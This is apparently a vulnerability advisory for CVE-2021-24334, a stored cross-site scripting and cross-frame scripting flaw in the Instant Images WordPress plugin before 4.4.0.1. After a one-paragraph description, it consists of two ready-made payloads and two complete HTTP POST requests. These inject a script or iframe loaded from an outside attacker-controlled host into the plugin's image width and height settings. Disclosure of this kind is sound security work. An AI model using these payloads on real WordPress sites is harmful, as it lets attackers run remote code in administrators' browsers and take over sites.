Instant Images WordPress Plugin < 4.4.0.1 – Authenticated Stored XSS & XFS | CVE 2021-24334

Description

The plugin did not properly validate and sanitise its unsplash_download_w and unsplash_download_h parameter settings (/wp-admin/upload.php?page=instant-images), only validating them client side before saving them, leading to a Stored Cross-Site Scripting issue.

Proof of Concept

### -- [ Payloads: ]

[$] "><script src=//m0ze.ru/payload/a.js></script><div x

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x



### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Max Image Upload Width: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 361

option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&instant_img_settings%5Bunsplash_download_h%5D=1337&instant_img_settings%5Bmedia_modal_display%5D=0



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Max Image Upload Height: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 375

option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=1337&instant_img_settings%5Bunsplash_download_h%5D=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x&instant_img_settings%5Bmedia_modal_display%5D=0